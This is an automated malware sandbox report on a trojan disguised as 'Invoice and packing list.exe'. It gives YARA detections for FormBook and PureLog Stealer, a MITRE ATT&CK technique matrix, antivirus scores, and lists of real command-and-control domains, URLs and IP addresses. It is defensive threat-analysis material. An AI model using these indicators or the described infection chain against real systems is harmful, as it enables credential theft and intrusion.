Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Queries volume information: C:\Users\user\AppData\Roaming\utlAHqvw.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Code function: 16_2_00D95FE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

16_2_00D95FE5

Source: C:\Users\user\Desktop\Invoice and packing list.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Invoice and packing list.exe.6d60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice and packing list.exe.2fd872c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice and packing list.exe.6d60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice and packing list.exe.2fd872c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.utlAHqvw.exe.350867c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.utlAHqvw.exe.350867c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice and packing list.exe.2db69f4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.utlAHqvw.exe.32e6944.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2068007786.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2097300869.000000000326D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2064262392.0000000002D3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Invoice and packing list.exe.6d60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice and packing list.exe.2fd872c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice and packing list.exe.6d60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice and packing list.exe.2fd872c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.utlAHqvw.exe.350867c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.utlAHqvw.exe.350867c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice and packing list.exe.2db69f4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.utlAHqvw.exe.32e6944.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2068007786.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2097300869.000000000326D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2064262392.0000000002D3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Code function: 16_2_00D94B96 fprintf,GetUdpStatisticsEx,GetIpStatisticsEx,SnmpUtilMemAlloc,fprintf,fprintf,SnmpUtilMemFree,fprintf,fprintf,SnmpUtilMemAlloc,SnmpUtilOidCpy,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,GetIcmpStatisticsEx,GetTcpStatisticsEx,

16_2_00D94B96

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	Data from Removable Media	12 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Access Token Manipulation	1 Abuse Elevation Control Mechanism	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	722 Process Injection	4 Obfuscated Files or Information	NTDS	213 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	2 Software Packing	LSA Secrets	331 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	722 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Rundll32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Invoice and packing list.exe	56%	Virustotal		Browse
Invoice and packing list.exe	50%	ReversingLabs	Win32.Trojan.Swotter
Invoice and packing list.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\utlAHqvw.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\utlAHqvw.exe	50%	ReversingLabs	Win32.Trojan.Swotter

Source	Detection	Scanner	Label
http://www.aportsystems.store/a03d/www.oftware-download-92806.bond	100%	Avira URL Cloud	malware
http://www.ndogaming.onlineReferer:	0%	Avira URL Cloud	safe
http://www.avid-hildebrand.info/a03d/	100%	Avira URL Cloud	malware
http://www.argloscaremedia.info	0%	Avira URL Cloud	safe
http://www.gmgslzdc.sbs	0%	Avira URL Cloud	safe
http://www.gmgslzdc.sbs/a03d/www.aportsystems.store	100%	Avira URL Cloud	malware
www.enelog.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.ive-neurozoom.store/a03d/www.yselection.xyz	100%	Avira URL Cloud	malware
http://www.yselection.xyz	0%	Avira URL Cloud	safe
http://www.otelhafnia.infoReferer:	0%	Avira URL Cloud	safe
http://www.aportsystems.store/a03d/	100%	Avira URL Cloud	malware
http://www.enelog.xyz/a03d/www.inggraphic.pro	100%	Avira URL Cloud	malware
http://www.aportsystems.store	0%	Avira URL Cloud	safe
http://www.itiz.xyzReferer:	0%	Avira URL Cloud	safe
http://www.ndogaming.online	0%	Avira URL Cloud	safe
http://www.ive-neurozoom.storeReferer:	0%	Avira URL Cloud	safe
http://www.aja168e.liveReferer:	0%	Avira URL Cloud	safe
http://www.aja168e.live/a03d/www.kkkk.shop	100%	Avira URL Cloud	malware
http://www.enelog.xyzReferer:	0%	Avira URL Cloud	safe
http://www.duxrib.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.kkkk.shop/a03d/www.ndogaming.online	100%	Avira URL Cloud	malware
http://www.gmgslzdc.sbs/a03d/	100%	Avira URL Cloud	malware
http://www.avid-hildebrand.infoReferer:	0%	Avira URL Cloud	safe
http://www.avid-hildebrand.info	0%	Avira URL Cloud	safe
http://www.gmgslzdc.sbsReferer:	0%	Avira URL Cloud	safe
http://www.otelhafnia.info/a03d/www.argloscaremedia.info	100%	Avira URL Cloud	malware
http://www.oftware-download-92806.bond	0%	Avira URL Cloud	safe
http://www.eepvid.xyz/a03d/www.gmgslzdc.sbs	100%	Avira URL Cloud	malware
http://www.enelog.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.otelhafnia.info/a03d/	100%	Avira URL Cloud	malware
http://www.eepvid.xyz	0%	Avira URL Cloud	safe
http://www.argloscaremedia.infoReferer:	0%	Avira URL Cloud	safe
http://www.oftware-download-92806.bond/a03d/	100%	Avira URL Cloud	malware
http://www.otelhafnia.info	0%	Avira URL Cloud	safe
http://www.ndogaming.online/a03d/	100%	Avira URL Cloud	malware
http://www.argloscaremedia.info/a03d/	100%	Avira URL Cloud	malware
http://www.avid-hildebrand.info/a03d/www.aja168e.live	100%	Avira URL Cloud	malware
http://www.inggraphic.pro/a03d/	100%	Avira URL Cloud	malware
http://www.itiz.xyz	0%	Avira URL Cloud	safe
http://www.itiz.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.yselection.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.itiz.xyz/a03d/www.duxrib.xyz	100%	Avira URL Cloud	malware
http://www.aportsystems.storeReferer:	0%	Avira URL Cloud	safe
http://www.aja168e.live	0%	Avira URL Cloud	safe
http://www.kkkk.shop	100%	Avira URL Cloud	malware
http://www.inggraphic.proReferer:	0%	Avira URL Cloud	safe
http://www.oftware-download-92806.bond/a03d/www.enelog.xyz	100%	Avira URL Cloud	malware
http://www.ive-neurozoom.store/a03d/	100%	Avira URL Cloud	malware
http://www.eepvid.xyzReferer:	0%	Avira URL Cloud	safe
http://www.inggraphic.pro	0%	Avira URL Cloud	safe
http://www.yselection.xyzReferer:	0%	Avira URL Cloud	safe
http://www.duxrib.xyz/a03d/www.otelhafnia.info	100%	Avira URL Cloud	malware
http://www.enelog.xyz	0%	Avira URL Cloud	safe
http://www.aja168e.live/a03d/	100%	Avira URL Cloud	malware
http://www.ive-neurozoom.store	0%	Avira URL Cloud	safe
http://www.kkkk.shop/a03d/	100%	Avira URL Cloud	malware
http://www.inggraphic.pro/a03d/www.avid-hildebrand.info	100%	Avira URL Cloud	malware
http://www.ndogaming.online/a03d/www.itiz.xyz	100%	Avira URL Cloud	malware
http://www.oftware-download-92806.bondReferer:	0%	Avira URL Cloud	safe
http://www.yselection.xyz/a03d/www.eepvid.xyz	100%	Avira URL Cloud	malware
http://www.eepvid.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.kkkk.shop/a03d/?S0G8J8=RRcPyliP5LCh&Urwh=7kIWeTjXu01wM95wC9Z21TPiKeV9inKAlApT+5tT392VMtn/oeqkDJdMplbadhcUzki4	100%	Avira URL Cloud	malware
http://www.kkkk.shopReferer:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.kkkk.shop	121.254.178.252	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
www.oftware-download-92806.bond	unknown	unknown	true	unknown
www.ndogaming.online	unknown	unknown	true	unknown
www.inggraphic.pro	unknown	unknown	true	unknown
www.gmgslzdc.sbs	unknown	unknown	true	unknown
www.aja168e.live	unknown	unknown	true	unknown
www.aportsystems.store	unknown	unknown	true	unknown
www.avid-hildebrand.info	unknown	unknown	true	unknown
www.ive-neurozoom.store	unknown	unknown	true	unknown
www.enelog.xyz	unknown	unknown	true	unknown
www.yselection.xyz	unknown	unknown	true	unknown
www.eepvid.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.enelog.xyz/a03d/	true	Avira URL Cloud: malware	unknown
http://www.kkkk.shop/a03d/?S0G8J8=RRcPyliP5LCh&Urwh=7kIWeTjXu01wM95wC9Z21TPiKeV9inKAlApT+5tT392VMtn/oeqkDJdMplbadhcUzki4	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.aportsystems.store/a03d/www.oftware-download-92806.bond	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.argloscaremedia.info	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.comon	explorer.exe, 0000000A.00000000.2056890977.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4492874400.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.gmgslzdc.sbs/a03d/www.aportsystems.store	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ndogaming.onlineReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yselection.xyz	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.avid-hildebrand.info/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ive-neurozoom.store/a03d/www.yselection.xyz	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.otelhafnia.infoReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 0000000A.00000002.4500322845.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2066553176.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/DataSet1.xsd	Invoice and packing list.exe, utlAHqvw.exe.0.dr	false		high
http://www.gmgslzdc.sbs	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 0000000A.00000003.3095073919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009B9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4494783707.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097484766.0000000009C21000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.aportsystems.store/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.micro	explorer.exe, 0000000A.00000002.4490737817.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2051156974.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488140180.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	false		high
http://www.aportsystems.store	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.duxrib.xyzReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.aja168e.liveReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
